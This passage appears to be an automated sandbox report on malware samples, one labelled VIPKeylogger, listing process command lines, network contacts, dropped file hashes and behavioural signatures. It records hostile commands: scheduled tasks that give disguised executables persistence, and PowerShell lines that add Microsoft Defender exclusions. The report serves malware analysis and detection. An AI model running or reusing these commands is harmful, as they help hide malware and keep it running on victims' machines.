schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Documents\sysmon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default\Documents\sysmon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Documents\sysmon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\2f3e0199fccb3f72e8a39924edc6a781\fontdrvhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\sysmon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe'
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b6ae157-8b64-43cb-ac10-a948f173177f.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\986d70b7-8c75-4058-9f1f-4cf43ce0a349.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eb7bcdea-7451-4191-97bb-7b63583916a8.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a76d9b01-68ad-4456-a1a4-00c1be7279e6.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\75d8afdd-eb20-4e77-b784-b85e7f9732e7.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11a04fb8-89e2-47d7-8e08-bbf933b6c666.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\adae97e0-5685-40c2-a067-5084cdafa210.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6791963a-f45c-4765-beb6-e7982de27768.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b0b4b5c5-dbff-4607-8e87-0383aaa9a4e4.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbbca99c-bd07-4012-ab91-e0547f958ba5.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6700d9fb-c70e-4df5-802b-0a60dde3a10d.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2010a383-8cfa-4199-ac9e-39e244c1c1de.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b2aa43f5-8e59-4c2f-a2c1-f6e1860f8773.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02ae8190-d26a-46e1-b614-1d5a1cceb15e.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58d4f751-9ef0-4884-911e-d5bcc125af2c.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30476efc-f3f6-4980-8ce8-6a01e7edc179.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1789c539-d417-4967-a27b-2073ad42ae17.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\59b708f5-8b3b-4a9d-812e-f8fab493c2ab.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp |
Files
memory/2832-0-0x00007FFD48583000-0x00007FFD48585000-memory.dmp
memory/2832-1-0x0000000000080000-0x000000000026A000-memory.dmp
memory/2832-2-0x00007FFD48580000-0x00007FFD49041000-memory.dmp
memory/2832-3-0x0000000002380000-0x000000000239C000-memory.dmp
memory/2832-6-0x00000000023A0000-0x00000000023B0000-memory.dmp
memory/2832-9-0x00000000023F0000-0x0000000002446000-memory.dmp
memory/2832-13-0x000000001AFA0000-0x000000001AFB2000-memory.dmp
memory/2832-11-0x000000001AF90000-0x000000001AF98000-memory.dmp
memory/2832-10-0x0000000002490000-0x000000000249C000-memory.dmp
memory/2832-15-0x000000001AFD0000-0x000000001AFDC000-memory.dmp
memory/2832-20-0x000000001B6E0000-0x000000001B6EC000-memory.dmp
memory/2832-17-0x000000001AFF0000-0x000000001AFFE000-memory.dmp
memory/2832-19-0x000000001B6D0000-0x000000001B6DC000-memory.dmp
memory/2832-18-0x000000001B000000-0x000000001B008000-memory.dmp
memory/2832-16-0x000000001AFE0000-0x000000001AFEA000-memory.dmp
memory/2832-14-0x000000001C060000-0x000000001C588000-memory.dmp
memory/2832-8-0x00000000023D0000-0x00000000023DA000-memory.dmp
memory/2832-7-0x00000000023B0000-0x00000000023C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RCX54A9.tmp
| MD5 | 192f0f1221e376146e725a4d23ee69a0 |
| SHA1 | 9500b9672eac1b1b2dee0e81f8b8efbb6d0d90ff |
| SHA256 | 019443010d028a6d5828afc530b1bd568e536afe32e715fe6a771f3ee1a3cc9d |
| SHA512 | daab36e062d27fd7a62607eb16a6013523fafabb31618e681feeae2fc92eb93d43c1f1a8051849aee4839d8b025ccf7227f5081847fd7b2c78e6f233f8d25a54 |
memory/2832-5-0x0000000000B80000-0x0000000000B88000-memory.dmp
memory/2832-4-0x0000000002440000-0x0000000002490000-memory.dmp
C:\Users\Default\Documents\sysmon.exe
| MD5 | 580e5064ca4b779d1d09219a657b7d50 |
| SHA1 | 4f8ea6b2f6a4a6d7b8557a5f77278bbf6b8f7161 |
| SHA256 | 2a6b133585b2961795c3cbb04a618a8686fee464bb3419e337140f9ded074dff |
| SHA512 | 85c088a2263d6341adf1837beb64e5369482c27cd1108e7f7637a4cf3d206c817bfa6f1ed1cfdaca4f3e8f612202125c63981debe2ac0f1052d1b16dd2023e77 |
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
| MD5 | b7894080a21eb5a3bce7689afbb0522f |
| SHA1 | e4b1e9b8c5457b36927b850a1efd2a13c47357de |
| SHA256 | a639a90c71371f8ea6c9caf3a8f8ac932bd5e94ebbd8a94ba80bb7646862130b |
| SHA512 | dbd9c611da30593733a8cf7a030c0a56a53b1050811cdfd22d0a2d5754b9212a3a09994e12617e9918b7e08784dbc4105bdacf67cec7ef7d96f3b4f56db79f3e |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rg2ywzog.5go.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4028-138-0x00000219EDF90000-0x00000219EDFB2000-memory.dmp
memory/4424-186-0x00000000003C0000-0x00000000005AA000-memory.dmp
memory/2832-187-0x00007FFD48580000-0x00007FFD49041000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 084d49c16a0db5a169356315e8e97d83 |
| SHA1 | af662c8666ef7c52c9711c0f143e0b8620f27d19 |
| SHA256 | a374d799d8b4b9c2cac922c093a90cbaf6d0bda3155faf176c6f95b46b8f35d2 |
| SHA512 | c14524f55f0e58bb64a99298b82d995136a0057c2a7e4e972b9c90477871ae416063318ba8b7f43a4fc66ca8b21eca26505645c4d195fe3ab9419c8d35a459fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ffb4808be0aaa918b807bb4dd4f5e080 |
| SHA1 | 8895ae463a633e1201ed09468acc86e1e57a838b |
| SHA256 | 26fb93195d69045c08c9720cd9291fec8cb24fe49f5dd2604c26d6873f41c3b2 |
| SHA512 | 7370e92e6c097ee52ef4d3e3b9ccbf482bbd3603bb25355c84c4c1599c94c8d0d4edc230d7db1ab8dd4d34c40afec839187fa5db46d48c58802e9e3107414ed9 |
memory/4424-199-0x000000001CD50000-0x000000001CDA6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 842369b08704bbddf9de4d90016e58dd |
| SHA1 | 8bc3da656c08abbc14c58201e65b0dc823964bea |
| SHA256 | cbf20404c609c0792de4320ac3fa1806269cf5d97420565e3f43d409a11a2808 |
| SHA512 | 8f6cc3419f04b1cb4e6c7986ad9fb8a43fb380fee263937e223d8a5269aec918c2c8cd362ee708de0ded3a533f4cd43624d606f45b37e128bec52ada30c43b42 |
C:\Users\Admin\AppData\Local\Temp\0b6ae157-8b64-43cb-ac10-a948f173177f.vbs
| MD5 | 93e69e1ff8482f031b35d40d2ef71303 |
| SHA1 | d77127acce0290e180676f139fcaf8335af765b2 |
| SHA256 | 9081711b1675f592ace8cdf863fc0d8ee9b611a7f0ff3844914846277f62a8d2 |
| SHA512 | 44eb6228484aeed97f6d96cc4f94e046adb2ddd129b2145fa71e1d834a8d3a6640b2b6c73af0f18da1344ebe06e22fce19524a9b3a825bf39d3e0a8addec0e23 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log
| MD5 | 364147c1feef3565925ea5b4ac701a01 |
| SHA1 | 9a46393ac3ffad3bb3c8f0e074b65d68d75e21ef |
| SHA256 | 38cf1ab1146ad24e88763fc0508c2a99478d8428b453ba8c8b830d2883a4562b |
| SHA512 | bfec1d3f22abd5668def189259deb4d919ceb4d51ac965d0baf9b6cf8bea0db680d49a2b8d0b75524cc04c7803cdfd91e484b31dc8ddc3ff47d1e5c59a9e35cf |
C:\Users\Admin\AppData\Local\Temp\a76d9b01-68ad-4456-a1a4-00c1be7279e6.vbs
| MD5 | 70001a75882477b11b14ead821e0041c |
| SHA1 | bc61badbf3c0b0e20506b7205db00040035fcbce |
| SHA256 | 0163fece010a4d0cfd72d263786e1f7dafa903dd8bb4dcb190f88da1d7e2f2ef |
| SHA512 | 9b02297879ffb5b5c5ed99ce87d9bb4e10d18c12c0da25bc6a4d799b3e827d9274bc7d6e6bf2a10112dab6adfcca47fd1933efc9ca8a751d2b30f5a0e63d277e |
C:\Users\Admin\AppData\Local\Temp\eb7bcdea-7451-4191-97bb-7b63583916a8.vbs
| MD5 | cb9b41199d53f23bd89d4d8fd909a9db |
| SHA1 | fe7dc4654ec51deda888f6b96e5337297f9a8c69 |
| SHA256 | 848bda3d52d9c1443ec77e96eceeeabea683e8b9aa93e83c12e4e1f2a9e76e63 |
| SHA512 | 565dcf2e1d438b1e2e5a43faa4370b3d95bd24b96a8e2fc82c34fa6b12cb100e16b6871ae9ed9f3108f928ec29c95dac951fc77601f189aa40ccd7f96b91affa |
C:\Users\Admin\AppData\Local\Temp\75d8afdd-eb20-4e77-b784-b85e7f9732e7.vbs
| MD5 | ee37f0cb0dffd9aa549a48dc18ac09ec |
| SHA1 | 604645fe606098e8163aba99dda3870b3b02daa0 |
| SHA256 | 59283d2cba9109742391c88ce249e395bda4a76121e900b3a8b87f923c9203a2 |
| SHA512 | 37134845e7c5c3b49e4db2cea5b99beeb1c1fc4fd1a3d5cd5daf521833507707ec6d08e272d75048bc5224a37538824bbcd6c8b43c851a283eea74403d4053ee |
memory/1688-233-0x000000001BDF0000-0x000000001BE02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\adae97e0-5685-40c2-a067-5084cdafa210.vbs
| MD5 | ba6115ad6f7d86261f8c6f87a007a44a |
| SHA1 | 4356173d94a391cf9d8300561864e11302b2a101 |
| SHA256 | d540ed9f50e9fae86ada2e15a683a26ff7f44289b640841c1c8b84014233cbf5 |
| SHA512 | bad9ba2c46f02281c2961f9b45bad5298c4f0e4e333f0b8f75cbf2104608b832bef3ca97fa2f83077cf2e867fdf9366ad7d551606a33f0b1ccb9e0bf97e2e1f4 |
C:\Users\Admin\AppData\Local\Temp\b0b4b5c5-dbff-4607-8e87-0383aaa9a4e4.vbs
| MD5 | 0810b2bf273f247893a309e7c28f2f77 |
| SHA1 | ce453f4c13e8c82b84d7ae489d483a6fc020844b |
| SHA256 | 1acb333b8f6649a966339896ca11f92b5b08106443a0a340e3986cb25d59ccef |
| SHA512 | e392e0dd705af82cb4dcb686036f983d98de520e57b7510f3420dd9b7f23d129c51b3a23ca75c49cf714dee3704eb5a60dc24c9a19462b09c173de7c3ef267d0 |
C:\Users\Admin\AppData\Local\Temp\6700d9fb-c70e-4df5-802b-0a60dde3a10d.vbs
| MD5 | b8739458d1e32adb250fb571d618a0e8 |
| SHA1 | aec28b21fc530f20e364f63597e282bdf7820b25 |
| SHA256 | b348155d09610b0027d2af8ced9f13d674076e6bc57e5bb8fb1170cf2d684be0 |
| SHA512 | 77ca8c26988b44941023083784b069a089c48067bdcac8c0868f331e7b3daa917e164f6ac7e2cc83492739515f895153d97289503528aec56b7eeb2926189664 |
C:\Users\Admin\AppData\Local\Temp\b2aa43f5-8e59-4c2f-a2c1-f6e1860f8773.vbs
| MD5 | b26b53442243ddf60685b746c32a0e07 |
| SHA1 | aa585329e3921ac1a530a6e9598746e6058fba09 |
| SHA256 | ccde0b0a1c225eae73a5b51ff720c1859eade7ae1bfa04a8826d8e37600c5ab5 |
| SHA512 | a49ffb4e8c216c1b91ae43b591af07d7af6d7560fde075e2ae4fdc2b58f1fa40fbaa30346b6a4d7e62eaf82a033d5430208b22540d49aaadbbefe0bafe3cbba9 |
memory/3964-278-0x000000001D240000-0x000000001D252000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\58d4f751-9ef0-4884-911e-d5bcc125af2c.vbs
| MD5 | 0a2e3215745ff4c5b946949b2fe2fbf4 |
| SHA1 | 4aea9d97e32f82ec670a9e9e02b1e20ee2f1c627 |
| SHA256 | cd3e08e48e2030fa770869ddbce520198a001e47895c79f069b1f65269606977 |
| SHA512 | 94fd68ff0f253697264141ea0039eb9e6b86940eb8f1d20c2c1c73fbe6e74baac474f7d4163eccbc90ff7b0e4f7d69909adee3aa4cfffcde3a93227d5a884ec2 |
C:\Users\Admin\AppData\Local\Temp\1789c539-d417-4967-a27b-2073ad42ae17.vbs
| MD5 | b7ecc58b7f6d397feb464dd173641da7 |
| SHA1 | a4bb906602e86f8df5d5f8efdcfbc00fc4bd1505 |
| SHA256 | 6a55cf218a931fa5c0553f356211aa3c5e61d5f9e1f4717401f22fee98d65a87 |
| SHA512 | 209b2d9aba98c6db84e41019aee110a3e0aee085ed21c40a0647c6f86a7d4a2073ef929636221569cea72aaf70f27783d3a9fe2bff71772a94ee9e2ed2c1e05d |
Analysis: behavioral10
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
132s
Max time network
140s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4580 set thread context of 5788 | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe
"C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\LbXyTV.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LbXyTV" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBBBE.tmp"
C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe
"C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.48.1:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/4580-0-0x00000000748CE000-0x00000000748CF000-memory.dmp
memory/4580-1-0x0000000000BF0000-0x0000000000CA2000-memory.dmp
memory/4580-2-0x0000000005CA0000-0x0000000006244000-memory.dmp
memory/4580-3-0x00000000056F0000-0x0000000005782000-memory.dmp
memory/4580-4-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4580-5-0x00000000056B0000-0x00000000056BA000-memory.dmp
memory/4580-6-0x00000000069C0000-0x00000000069D0000-memory.dmp
memory/4580-7-0x00000000748CE000-0x00000000748CF000-memory.dmp
memory/4580-8-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4580-9-0x0000000006A10000-0x0000000006A9E000-memory.dmp
memory/4580-10-0x000000000A5D0000-0x000000000A66C000-memory.dmp
memory/2140-15-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/2140-16-0x0000000002370000-0x00000000023A6000-memory.dmp
memory/2140-17-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/2140-18-0x0000000004E60000-0x0000000005488000-memory.dmp
memory/4844-22-0x00000000053D0000-0x0000000005436000-memory.dmp
memory/2140-33-0x0000000005680000-0x00000000059D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_foyrrmvz.av4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
